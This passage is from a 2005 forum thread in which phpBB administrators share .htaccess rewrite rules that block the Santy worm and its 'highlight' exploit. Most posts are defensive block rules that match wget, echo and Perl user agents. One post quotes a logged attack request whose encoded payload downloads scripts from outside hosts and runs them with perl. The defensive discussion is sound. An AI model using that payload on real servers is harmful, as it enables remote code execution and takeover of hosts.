Page 11 of 16

Posted: Fri Jan 07, 2005 8:56 pm
by Joe User
The [R,L] results in a 302 response...

Posted: Fri Jan 07, 2005 9:05 pm
by john_r
Hi

Yes know that, but why should it only send some lines to 302 and others get 200.

After last post changed .htaccess to

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ http://127.0.0.1 [R,L]

and later checking my logs, see that requests to

/phpbb/posting.php
/phpbb/profile.php
/phpbb/privmsg.php

Still get re-routed ie 302 All other requests get 200

So have banned those lines in the robots txt

but would like to know why only those requests get re-routed

Rgds

Posted: Fri Jan 07, 2005 11:02 pm
by Taipo
Why focus on the occurance of 'highlight=%2527' in a GET request string when it is in fact the occurance of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get thru the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='

Posted: Sat Jan 08, 2005 8:24 am
by bmer
Taipo wrote: Why focus on the occurance of 'highlight=%2527' in a GET request string when it is in fact the occurance of '%2527' alone that is of concern. As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get thru the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='


You guys are all talking a foreign language to me. :lol:

Here is my problem. I upgraded my forum to 2.0.11 and it seemed to cut down on guest access, but I still have around 4-10 guests all the time yet. My host is running PHP 4.3.10. I tired adding that .htaccess file at the top of this post, but get a critical error. This is driviing me nuts. My host isn't much help. What can I do? Can someone help? I get dizzy reading through all these posts. :lol:

Posted: Mon Jan 10, 2005 3:53 pm
by px1369
I just want to confirm that this htaccess modification will fix my troubles?

Code: Select all

RewriteEngine On 

# prevent access from santy webworm a-e 
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR] 
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR] 
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent pre php 4.3.10 bug 
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b 
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

# prevent perl user agent (most often used by santy) 
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC] 
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
I have had several hundred diferrent IPs attempt to access my server and one account that has thousands of visitors daily is still receiving these:

Code: Select all

/viewtopic.php?t=125&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1

Code: Select all

Mod_Security-Message:
Access denied with code 406. Pattern match "wget " at THE_REQUEST.
Thanx

Posted: Tue Jan 11, 2005 10:11 pm
by Mikalee
[Edit - problem corrected, server issue]

Posted: Thu Jan 13, 2005 8:12 am
by jsprague
Hello,

Just wondering what the following code listed in the .htaccess examples will do..

Code: Select all

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?

Thanks![/quote]

Posted: Thu Jan 13, 2005 9:53 am
by Joe User
jsprague wrote:

Code: Select all

RewriteRule ^.*$ http://127.0.0.1/ [R,L]
What does this line do?


It redirects the requests back to the sourcesystem ;)

Posted: Sat Jan 22, 2005 10:26 am
by FuZiWuZi
Hello,

If I buy a new hosting and download a new version of phpbb do I have to run the patch for this worm? Or is it already done?

thx,
Fuz

Posted: Sat Jan 22, 2005 3:55 pm
by -=ORC_The_Dude=-
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports *.htaccess extension. It doesn't allow me renaming a file as .htaccess without anything before the dot



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???

Posted: Sun Jan 23, 2005 3:08 am
by Psychotic_Carp
-=ORC_The_Dude=- wrote:
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports *.htaccess extension. It doesn't allow me renaming a file as .htaccess without anything before the dot



but no one answers the question...

is it possible to get one file in a zip containing .htaccess file it self. ...???


try this

there is already a .htaccess file in your phpbb folder (cache folder)

download it to your desktop make notpad open it or get the html kit (google it) paste in the code and save it, then upload it where you want it


what i want to know is what is the best code to currently use? and what folders are the best to use? (replace the one in the cache folder? and can i place the file in multiple locations?

Posted: Mon Jan 24, 2005 6:05 pm
by damiel
whit wrote: You could probably get away with:

Code: Select all

RewriteEngine On 
RewriteBase / 

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$        -       [F,L]   
The highlight line catches I think all the variants of Santy I've logged. The next catches all the attempts to at custom hacks from Perl I've seen so far (everything starting with LWP or lwp - the "NC" means "no case"). You can at the very least get rid of all the LWP and lwp lines but that one.


I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel

Posted: Mon Jan 24, 2005 6:31 pm
by damiel
BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

Posted: Mon Jan 24, 2005 6:33 pm
by damiel
BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

Posted: Mon Jan 24, 2005 7:53 pm
by jsundqui
damiel wrote: I realized today that my forum was being hit by these stupid worms (far too many "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel


It seems the worms kicked it up a notch today at my site as well. I did the modrewrite changes to .htaccess a while ago so they all get 403'd, but I was only getting worm attempts every few minutes or so, and from what seemed to be hijacked cable/DSL home lusers. But today it has cranked up to every 10 seconds or so, and seem to be coming from hosting outfits. This all based on unscientific sampling of IPs to lookup. But the hit rate is definitely a huge spike today.

BTW, I've been getting some users registering from Russia that seem intent on breaking in. They got in a while ago, probably by reading config.php before I upgraded to 2.0.11 (and I had the same password for the db as the site - since changed) (curiously, site was not defaced as was done with other santy attacks, although my portal page was eventually hacked, no other files deleted, though). But it is curious that they needed to sign up as users to do this. Is there another crack out there not yet discovered or reported?